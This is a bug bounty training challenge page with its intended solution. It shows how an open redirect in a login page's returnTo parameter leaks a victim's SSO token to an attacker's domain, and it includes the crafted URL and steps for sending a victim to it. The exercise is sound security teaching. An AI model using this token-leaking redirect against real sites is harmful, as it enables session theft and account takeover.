Our challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic. Please practise hacking on our challenges manually.
Failure to abide by the rules will put you at risk of being restricted from using our free challenges.
Can you steal the SSO token?
Open URL Redirect
We've built a super secure login portal to access our diet plan and we'd love your help to make sure we've set it up correctly.
You can login to ManageMyDiet with the following credentials:
We've added SSO support and we'd like to make sure it's all set up ok and you can't leak the token to other domains.
Completed the challenge?
You can browse the intended solution to this challenge below.
After logging in you will notice two cookies are set:
SSO is set for less time than
Delete the cookie
sso and revisit
https://www.bugbountytraining.com/challenges/loginchallenge and you'll notice it redirects back to
&sso= appended. Seems interesting, right?
So you've discovered after the SSO token has expired, revisiting the login page will set it again. But how do we leak it?
ALWAYS test common keywords on register/login pages such as
goto as they are more than likely going to do something. In this case, revisiting
https://www.bugbountytraining.com/challenges/loginchallenge?returnTo=.mysite.com/?c= will result in the users SSO token being leaked to your domain.
- Login using
- Delete SSO token (naturally expires after 1 hour)
- Send victim to
https://www.bugbountytraining.com/challenges/loginchallenge?returnTo=.mysite.com/?c= and if they are logged in (
userinfo set), it will leak their
sso token to your website!